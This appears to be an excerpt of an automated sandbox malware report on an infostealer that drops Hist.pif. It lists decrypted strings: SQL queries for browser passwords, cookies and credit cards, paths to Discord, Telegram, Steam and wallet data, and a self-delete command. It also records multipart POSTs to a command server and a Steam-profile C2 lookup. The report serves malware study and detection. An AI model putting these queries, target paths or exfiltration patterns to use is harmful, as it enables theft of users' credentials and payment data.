                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: NSS_Shutdown
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: PK11_GetInternalKeySlot
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: PK11_FreeSlot
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: PK11_Authenticate
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: PK11SDR_Decrypt
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: C:\ProgramData\
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Soft:
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: profile:
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Host:
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Login:
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Password:
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Opera
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: OperaGX
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Network
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Cookies
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: .txt
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: TRUE
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: FALSE
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Autofill
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: SELECT name, value FROM autofill
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: History
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Name:
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Month:
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Year:
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Card:
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Cookies
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Login Data
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Web Data
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: History
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: logins.json
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: formSubmitURL
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: usernameField
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: encryptedUsername
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: encryptedPassword
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: guid
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: cookies.sqlite
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: formhistory.sqlite
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: places.sqlite
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Plugins
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Local Extension Settings
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Sync Extension Settings
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: IndexedDB
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Opera Stable
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Opera GX Stable
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: CURRENT
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: chrome-extension_
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: _0.indexeddb.leveldb
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Local State
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: profiles.ini
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: chrome
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: opera
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: firefox
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Wallets
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: %08lX%04lX%lu
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: ProductName
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: %d/%d/%d %d:%d:%d
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: ProcessorNameString
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: DisplayName
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: DisplayVersion
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: freebl3.dll
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: mozglue.dll
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: msvcp140.dll
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: nss3.dll
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: softokn3.dll
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: vcruntime140.dll
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: \Temp\
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: .exe
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: runas
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: open
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: /c start
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: %DESKTOP%
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: %APPDATA%
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: %LOCALAPPDATA%
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: %USERPROFILE%
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: %DOCUMENTS%
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: %PROGRAMFILES%
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: %PROGRAMFILES_86%
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: %RECENT%
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: *.lnk
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Files
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: \discord\
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: \Local Storage\leveldb\CURRENT
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: \Local Storage\leveldb
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: \Telegram Desktop\
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: key_datas
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: D877F783D5D3EF8C*
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: map*
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: A7FDF864FBC10B77*
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: A92DAA6EA6F891F2*
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: F8806DD0C461824F*
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Telegram
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: *.tox
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: *.ini
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Password
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: 00000001
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: 00000002
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: 00000003
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: 00000004
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: \Outlook\accounts.txt
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Pidgin
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: \.purple\
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: accounts.xml
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: dQw4w9WgXcQ
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: token:
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Software\Valve\Steam
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: SteamPath
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: \config\
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: ssfn*
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: config.vdf
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: DialogConfig.vdf
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: DialogConfigOverlay*.vdf
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: libraryfolders.vdf
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: loginusers.vdf
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: \Steam\
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: sqlite3.dll
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: browsers
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: done
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Soft
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: \Discord\tokens.txt
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: /c timeout /t 5 & del /f /q "
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: C:\Windows\system32\cmd.exe
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: https
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: POST
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: HTTP/1.1
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Content-Disposition: form-data; name="
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: hwid
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: build
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: token
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: file_name
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: file
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: message
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: screenshot.jpg
                    Source: mg9LPWGtPB.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.5:64934 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 65.109.241.221:443 -> 192.168.2.5:64935 version: TLS 1.2
                    Source: mg9LPWGtPB.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: mozglue.pdbP source: Hist.pif, 0000000B.00000002.3103223842.000000006C52D000.00000002.00000001.01000000.00000009.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, mozglue.dll.11.dr
                    Source: Binary string: freebl3.pdb source: Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.11.dr
                    Source: Binary string: freebl3.pdbp source: Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.11.dr
                    Source: Binary string: nss3.pdb@ source: Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3103502423.000000006C6EF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.11.dr
                    Source: Binary string: softokn3.pdb@ source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Hist.pif, 0000000B.00000002.3094585967.000000002B5DB000.00000004.00000800.00020000.00000000.sdmp, vcruntime140.dll.11.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: Hist.pif, 0000000B.00000002.3088383487.000000001F6FA000.00000004.00000800.00020000.00000000.sdmp, msvcp140.dll.11.dr
                    Source: Binary string: nss3.pdb source: Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3103502423.000000006C6EF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.11.dr
                    Source: Binary string: mozglue.pdb source: Hist.pif, 0000000B.00000002.3103223842.000000006C52D000.00000002.00000001.01000000.00000009.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, mozglue.dll.11.dr
                    Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: Hist.pif, 0000000B.00000002.3078787220.000000000CCAF000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3078228591.000000000C878000.00000002.00001000.00020000.00000000.sdmp
                    Source: Binary string: softokn3.pdb source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_000847B7 GetFileAttributesW,FindFirstFileW,FindClose,11_2_000847B7
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_00083E72 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00083E72
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0008C16C FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_0008C16C
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0008CB81 FindFirstFileW,FindClose,11_2_0008CB81
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0008CC0C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_0008CC0C
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0008F445 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0008F445
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0008F5A2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0008F5A2
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0008F8A3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_0008F8A3
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_00083B4F FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00083B4F
                    Source: C:\ProgramData\EHIJJDGDHD.exeCode function: 16_2_004062D5 FindFirstFileW,FindClose,16_2_004062D5
                    Source: C:\ProgramData\EHIJJDGDHD.exeCode function: 16_2_00402E18 FindFirstFileW,16_2_00402E18
                    Source: C:\ProgramData\EHIJJDGDHD.exeCode function: 16_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,16_2_00406C9B
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003A47B7 GetFileAttributesW,FindFirstFileW,FindClose,38_2_003A47B7
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003AC16C FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,38_2_003AC16C
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003ACB81 FindFirstFileW,FindClose,38_2_003ACB81
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003ACC0C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,38_2_003ACC0C
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003AF445 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,38_2_003AF445
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003AF5A2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,38_2_003AF5A2
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003AF8A3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,38_2_003AF8A3
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003A3B4F FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,38_2_003A3B4F
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003A3E72 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,38_2_003A3E72
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

                    Networking

                    Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199735694209
                    Source: global trafficTCP traffic: 192.168.2.5:64962 -> 91.92.246.78:2404
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 12 Jul 2024 08:38:34 GMTServer: Apache/2.4.58 (Ubuntu)Last-Modified: Wed, 10 Jul 2024 14:07:09 GMTETag: "13c06a-61ce529788cc5"Accept-Ranges: bytesContent-Length: 1294442Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 da e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 6e 00 00 00 ce 06 00 00 42 00 00 83 38 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 c0 0f 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 9b 00 00 b4 00 00 00 00 40 0f 00 30 68 00 00 00 00 00 00 00 00 00 00 22 7a 13 00 48 46 00 00 00 a0 07 00 64 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ae 6d 00 00 00 10 00 00 00 6e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 62 2a 00 00 00 80 00 00 00 2c 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 7e 06 00 00 b0 00 00 00 02 00 00 00 9e 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 30 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 30 68 00 00 00 40 0f 00 00 6a 00 00 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 32 0f 00 00 00 b0 0f 00 00 10 00 00 00 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global traffic | HTTP traffic detected: GET /profiles/76561199735694209 HTTP/1.1 | Host: steamcommunity.com | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
                    Source: Joe Sandbox View | IP Address: 65.109.241.221
                    Source: Joe Sandbox View | IP Address: 199.59.243.226
                    Source: Joe Sandbox View | IP Address: 23.192.247.89
                    Source: Joe Sandbox View | ASN Name: AKAMAI-ASUS
                    Source: Joe Sandbox View | JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                    Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Host: 65.109.241.221 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----EHIDAKECFIEBGDHJEBKK | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Host: 65.109.241.221 | Content-Length: 279 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----DHIEHIIEHIEHJKEBKEHJ | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Host: 65.109.241.221 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----DHDHCGHDHIDHCBGCBGCA | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Host: 65.109.241.221 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----KKFBFCAFCBKFIEBFHIDB | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Host: 65.109.241.221 | Content-Length: 332 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----KJEHDHIEGIIIDHIDHDHJ | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Host: 65.109.241.221 | Content-Length: 5561 | Connection: Keep-Alive | Cache-Control: no-cache
